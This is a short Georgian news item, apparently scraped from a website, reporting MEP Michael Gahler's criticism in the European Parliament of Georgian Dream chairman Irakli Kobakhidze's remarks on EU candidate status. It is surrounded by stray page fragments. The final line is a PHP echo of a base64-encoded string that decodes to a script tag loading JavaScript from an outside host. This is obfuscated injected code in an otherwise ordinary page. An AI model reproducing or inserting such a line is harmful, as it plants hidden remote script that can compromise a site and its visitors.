celsiusi
ავერსი შნაიდერი

ქართული ოცნების თავმჯდომარის სარკასტული გამონათქვამები აუარესებს სიტუაციას - აცხადებს ევროპარლამენტარი მაიკლ გალერი ევროპარლამენტში სიტყვით გამოსვლისას.

ევროდეპუტატებმა ბრიუსელში საქართველოს შესახებ, მორიგი მწვავე რეზოლუციის პროექტი განიხილეს. რეზოლუციის პროექტის ავტორი დეპუტატი სვენ მიქსერია.

გალერიმ სიტყვით გამოსვლისას აღნიშნა, რომ ირაკლი კობახიძის განცხადებები EU-ს კანდიდატის სტატუსისა და ომში ჩართვაზე, აჩვენებს, რომ "ქართული ოცნება" სხვა გზას ადგას.

"ვფიქრობ, ქართველმა ხალხმა კარგად იცის, ვისი ბრალია, რომ საქართველომ ვერ მიიღო იგივე სტატუსი, რაც უკრაინამ და მოლდოვამ. ვფიქრობ, ქართული ოცნების თავმჯდომარის სარკასტული გამონათქვამები, რომ თუ საქართველო დეკემბრისთვის ომში ჩაერთვება, ის აუცილებლად მიიღებს კანდიდატის სტატუსს, საქმეს არ შველის. პირიქით, აუარესებს სიტუაციას და გვაჩვენებს, რომ ქართული ოცნება სრულიად სხვა გზას ადგას. ამიტომ, მნიშვნელოვანია, რომ ქართული ოცნება კონცენტრირდეს კომისიის მიერ წარდგენილ 12 პუნქტზე, რათა ქვეყანამ კანდიდატის სტატუსი მიიღოს." – თქვა ევროდეპუტატმა. 

 

928
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");